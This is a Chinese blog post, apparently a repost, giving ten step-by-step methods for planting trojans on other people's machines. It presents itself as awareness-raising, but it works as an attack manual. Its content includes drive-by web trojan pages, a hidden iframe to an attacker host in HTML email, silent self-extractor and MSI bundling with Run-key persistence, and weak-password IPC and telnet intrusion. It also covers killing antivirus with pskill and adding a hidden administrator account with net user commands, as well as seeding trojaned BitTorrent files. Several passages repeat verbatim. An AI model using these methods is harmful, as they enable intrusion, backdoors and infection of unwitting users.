木马的原理和使用其实是很简单的,但问题是我们如何让我们的木马能够种植到别人的机器上呢?
要知道如果不能在别人计算机上种植木马,那就只能在自己机器上自娱自乐了。接下来我就介绍一些黑客常用的木马种植技术,希望大家能通过学习增强防范木马的意识,尽量避免以下的一些问题。
第一招:网页木马制作。
由于目前上互联网的人往往都要使用IE这个软件,所以黑客们都把很多的经历投入到了IE的研究上。结果就是IE的漏洞不断的被爆出。关于漏洞的具体问题,我们在后面的章节再介绍。这里我们提到的就是一种可以远程执行的漏洞,简单的说,就是你看了我的网页,由于你的IE有漏洞,就会自动执行我所指定的那个文件,如果这个文件是木马,你就惨了。
有人把这种攻击方式形象的比喻成“网页挂马”,再加上跨站技术,弄得现在都人心惶惶的。(用firefox上网,危险小得多)
不过,大家可能也会有疑问:就咱这水平,连个HTML都不会写,怎么挂啊?迷糊。这就要感谢网络上的那些高手了,他们不辞辛苦的为我们写了很多漏洞利用程序。比如:老丁网页木马生成器。(大家看到笔记时,可能这个漏洞早就被多数人补上了,不过没关系,类似漏洞不断的爆,类似软件不断的出,用法差不多)。使用过程如下:
1、准备一个空间
2、配置好马儿,假设名字为mm.exe
3、打开老丁,输入http://你的地址/ma/mm.exe,再点生成网页。
4、把生成的网页laoding.htm传到服务器上,再把mm.exe传到ma这个子目录。
这样,只要有人访问laoding.htm这个网页就会中马啦。
第二招:邮件携带
用方法一做好的木马传到空间上以后,就可以在写邮件的时候,选择HTML编辑方式(如果是outlook,新建邮件时点“察看”-“编辑源文件”,foxmail你自己找找看),再加入以下内容,实现在网页中包含一个框架:
"<iframe src=" [url]http://xxxxx.com/xxxx.htm[/url]" ; width="0" height="0"></iframe>",这招够阴毒。以前试过这一招,挺好用的。
"<iframe src=" [url]http://xxxxx.com/xxxx.htm[/url]" ; width="0" height="0"></iframe>",这招够阴毒。以前试过这一招,挺好用的。
不过,这一招也有些问题。目前的SMTP在发信时都会把包含这个框架的邮件过滤掉。所以我们只能自己创建MAIL服务器了。好在Mdaemon很好用,大家安装配置完在安全菜单中把框架过滤那个勾去掉就行了。用你自己的SMTP发信吧!
第三:在flash文件中捆绑
打开flashMX,新建影片或打开其它影片(.swf),创建一个空白关键帧,选择动作-浏览器-双击geturl,输入网页地址,再点动作-影片控制-停止动作,导出电影文件即可。FLASH没怎么用过,这回才知道,原来看flash也要小心啊。
打开flashMX,新建影片或打开其它影片(.swf),创建一个空白关键帧,选择动作-浏览器-双击geturl,输入网页地址,再点动作-影片控制-停止动作,导出电影文件即可。FLASH没怎么用过,这回才知道,原来看flash也要小心啊。
第四:视频传播
用realmedia editor,工具-合并事件 事先写个文本文件,内容是: u 00:5.0 00:8.0 网马网址,这样就可以了。
第五:文件捆绑
不说了,工具太多。把一个正常的文件和木马捆绑在一起,在找个图标掩饰一下就行。但我要说的是:无论如何,捆绑后的扩展名都一定是".exe"。
如果大家没有工具,也可以用winrar捆绑。方法是把正常文件和木马放在一,记录两个文件的名字。然后把两个文件都选中,右键-添加到压缩文件。再选中“创建自解压文件”。然后在“高级”-“自解压选项”中,写好压缩前运行的文件(正常文件),写好压缩后运行文件(木马),再选静默模式中的全部隐藏就行了。
第六:通过MS较新的软件安装包MSI也可以捆绑木马
1、取得正常安装后的文件,最好使用软件的绿色版,把所有文件和木马文件放在同一个目录。
2、使用advance installer,到霏凡可以找到crack版。新建工程,选择专业版-新建工程向导,点击下一步、浏览选择准备好的目录。
3、有快捷方式的选择地方,把软件包中的主程序勾选,软件语言据实填写。
4、最后一步,绝对不要选:现在创建。这样就会进入下一步,软件的主程序界面。
5、选“文件或文件夹”,点开“windows volume”,新建一个system32,再把木马拽过去,这样MSI安装完成后,木马会自动放在这个目录中。
6、选“注册表”,在HKCU-software-microsoft-windows-current version-run中加载提到的木马文件即可。(当然,如果系统中安装有瑞星这样可以监控系统注册表的软件,安装到此步时会出现提示。)
7、如果木马支持服务启动,也可以在服务-安装服务上点右键-新建服务初始化,
8、在左侧菜单选“自定义操作”,在安装执行顺序下的install上右键,选新建安装的自定义操作,选中木马文件,选“异步执行,不等待返回”,这样可以避免安装出现延迟,在执行选项中选确认(绝不能选立即执行)。
9、F7生成工程文件即可。
第七:配合扫描工具
本例可以使用流光,也可以使用傻瓜IPC扫描器。
1、用流光扫描有IPC漏洞的计算机(就是设置了弱密码计算机)
2、扫描完成后,点工具菜单-IPC工具-种植者
找到配置好的木马文件-再选中木马种植的路径-出现提示“指定的程序将在**秒后执行”
3、等待肉鸡上线即可。
注:本实验成功机率较小,2003 2000等系统为防止有人加自动运行程序,作了保护。如果目标主机上有杀软,也会杀掉木马。如果目标主机没有隐含共享,也没有其它共享目录,则更无法实现。
本例可以使用流光,也可以使用傻瓜IPC扫描器。
1、用流光扫描有IPC漏洞的计算机(就是设置了弱密码计算机)
2、扫描完成后,点工具菜单-IPC工具-种植者
找到配置好的木马文件-再选中木马种植的路径-出现提示“指定的程序将在**秒后执行”
3、等待肉鸡上线即可。
注:本实验成功机率较小,2003 2000等系统为防止有人加自动运行程序,作了保护。如果目标主机上有杀软,也会杀掉木马。如果目标主机没有隐含共享,也没有其它共享目录,则更无法实现。
第八:手工开telnet种植
1、最简单就是用阿D工具包,找到其中的肉鸡扫描,找到弱密码的肉鸡后,点:打开telnet服务。
2、把查看进行和删除进行的两个程序:pslist.exe pskill.exe 以及木马文件上传到一个FTP服务器。
3、telnet x.x.x.x "telnet连接目标主机
1、最简单就是用阿D工具包,找到其中的肉鸡扫描,找到弱密码的肉鸡后,点:打开telnet服务。
2、把查看进行和删除进行的两个程序:pslist.exe pskill.exe 以及木马文件上传到一个FTP服务器。
3、telnet x.x.x.x "telnet连接目标主机
通过ftp连接到放了好多黑客软件的服务器。ftp y.y.y.y
mget * "下载所有文件
pslist 查看所有进程
pskill 杀掉杀毒软件进程
mget * "下载所有文件
pslist 查看所有进程
pskill 杀掉杀毒软件进程
如果杀毒软件实现关不掉(许多杀软有进程保护机制),就只好做我们最不忍心的事儿了(删除杀毒软件的所有文件,再重启他的机器)
4、执行木马
4、执行木马
5、留下后门,大家可以用以下的方法,但最好还是克隆一个管理员帐号,如果不会,就baidu一下,网上很多说明。
net user bob$ /add
net localgroup administrators bob$ /add
net user bob$ /add
net localgroup administrators bob$ /add
提示:如果关闭了ipc$共享,或对方计算机密码无法破解,此办法无效。另外,针对于不是空密码的简单密码,可以考虑在扫描工具中配合事先生成的字典。
第九:BT捆绑
1、掌握一个最新最受欢迎的电影,用以下方法之一进行捆绑
文件捆绑器:缺点易被发现扩展名的问题。
文件欺骗法:制做N个EXE文件,有的绑木马,有的不绑。
2、用bt软件生成种子
3、到网站推介种子,将来下的人越多,中马的人越多。
1、掌握一个最新最受欢迎的电影,用以下方法之一进行捆绑
文件捆绑器:缺点易被发现扩展名的问题。
文件欺骗法:制做N个EXE文件,有的绑木马,有的不绑。
2、用bt软件生成种子
3、到网站推介种子,将来下的人越多,中马的人越多。
第十:蜜罐种植法
在计算机上开一个guest可访问的共享,里边放一些捆绑了木马的文件,然后就等着一些小鸟进洞吧!!!
以上提到的方法还远没有把黑客种马的技术说完全(笔者水平也就这样儿了),所以黑客们的欺骗手段真的是防不胜防。所以,大家一定要擦亮眼睛。中个马不要紧,但作为一名IT专业人士,咱可丢不起那人啊。
本文转自 霜寒未试 51CTO博客,原文链接:http://blog.51cto.com/51bbs/147916,如需转载请自行联系原作者
